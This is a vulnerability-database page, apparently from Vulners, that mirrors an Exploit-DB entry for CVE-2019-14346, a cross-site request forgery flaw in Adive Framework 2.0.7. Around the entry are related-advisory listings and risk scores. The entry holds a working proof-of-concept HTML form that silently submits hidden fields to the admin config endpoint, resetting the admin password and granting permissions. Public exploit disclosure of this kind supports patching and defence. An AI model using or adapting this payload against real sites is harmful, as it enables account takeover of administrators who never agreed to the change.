Lucene search
K

Adive Framework 2.0.7 - Cross-Site Request Forgery

🗓️ 08 Aug 2019 00:00:00Reported by Pablo SantiagoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 185 Views

Adive Framework 2.0.7 Cross-Site Request Forgery vulnerability, allows password chang

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Adive Framework 2.0.7 - Cross-Site Request Forgery Vulnerability
9 Aug 201900:00
zdt
CNVD
Schben Adive Cross-Site Request Forgery Vulnerability
7 Aug 201900:00
cnvd
CVE
CVE-2019-14346
6 Aug 201914:23
cve
Cvelist
CVE-2019-14346
6 Aug 201914:23
cvelist
EUVD
EUVD-2019-5562
7 Oct 202500:30
euvd
exploitpack
Adive Framework 2.0.7 - Cross-Site Request Forgery
8 Aug 201900:00
exploitpack
NVD
CVE-2019-14346
6 Aug 201915:15
nvd
OSV
CVE-2019-14346
6 Aug 201915:15
osv
Packet Storm
Adive Framework 2.0.7 Cross Site Request Forgery
8 Aug 201900:00
packetstorm
Prion
Cross site request forgery (csrf)
6 Aug 201915:15
prion
Rows per page
# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
# Date:02/08/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://adive.es
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows and Kali linux
# CVE :2019-14346

# 1. Technical Description:
# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
#Request Forgery vulnerability, an attacker could change any user
password.

# 2. Proof Of Concept (CODE):

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/adive/admin/config" method="POST">
      <input type="hidden" name="userName" value="admin" />
      <input type="hidden" name="confPermissions" value="1" />
      <input type="hidden" name="pass" value="1234" />
      <input type="hidden" name="cpass" value="1234" />
      <input type="hidden" name="invokeType" value="web" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# 3. References:
# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
# https://imgur.com/apuZa9q

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Aug 2019 00:00Current
9High risk
Vulners AI Score9
CVSS 24.3
CVSS 38.8
EPSS0.00393
185